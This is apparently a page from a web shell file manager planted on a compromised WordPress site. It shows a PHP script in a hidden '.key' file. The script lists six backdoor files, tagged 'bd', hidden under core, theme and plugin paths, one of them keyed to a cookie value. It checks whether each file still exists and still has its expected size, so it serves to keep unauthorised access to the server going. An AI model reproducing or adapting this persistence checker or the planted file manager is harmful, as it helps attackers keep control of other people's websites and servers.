OwlCyberSecurity - MANAGER
Edit File: .key
<?php $r = '/home/logoxprt/fashionsgalleria.com'; $x = ["/wp-includes/functions.wp-scripts.php"=>"bd@@160837935@@87", "/sitewipe/wp-content/themes/salient/nectar/redux-framework/ReduxCore/inc/fields/spinner/field.spinner.php"=>"bd@@118260785@@1055", "/wp-content/themes/woodmart/inc/modules/layouts/admin/templates/predefined.php"=>"bd@@125069957@@624", "/wp-content/plugins/imagify/inc/Dependencies/ActionScheduler/classes/ActionScheduler_OptionLock.php"=>"bd@@141983447@@$_COOKIE[6", "/seamless/wp-content/themes/salient/nectar/redux-framework/ReduxCore/inc/fields/textarea/field.textarea.php"=>"bd@@125130676@@598", "/wp-content/plugins/filester/includes/File_manager/lib/php/plugins/AutoResize/tahoma.php"=>"bd@@141983825@@1042"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');